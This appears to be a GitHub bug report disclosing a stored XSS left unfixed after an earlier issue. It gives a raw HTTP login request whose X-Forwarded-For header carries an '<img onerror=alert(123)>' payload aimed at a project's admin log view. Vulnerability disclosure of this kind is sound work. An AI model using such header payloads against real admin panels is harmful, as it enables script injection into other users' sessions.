In issue 9, someone reported two storage XSS, and you have fixed, but the Second XSS. But it still has another output point X-Forwarded-For
payload HTTP Requests
POST /admin/getLogin HTTP/1.1Host: xxxxUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.47 Safari/537.36Accept: application/json, text/javascript, */*; q=0.01Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Referer:Content-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 56Connection: closeCookie: JSESSIONID=X-Forwarded-For: 127.<img src=1 onerror=alert(123)>0.0.2loginName=asas&loginPwd=asas
The text was updated successfully, but these errors were encountered:
我确定我已经查看了 (标注
[ ]为[x])我要申请 (标注
[ ]为[x])Bug Report
In issue 9, someone reported two storage XSS, and you have fixed, but the Second XSS. But it still has another output point
X-Forwarded-Forpayload HTTP Requests
The text was updated successfully, but these errors were encountered: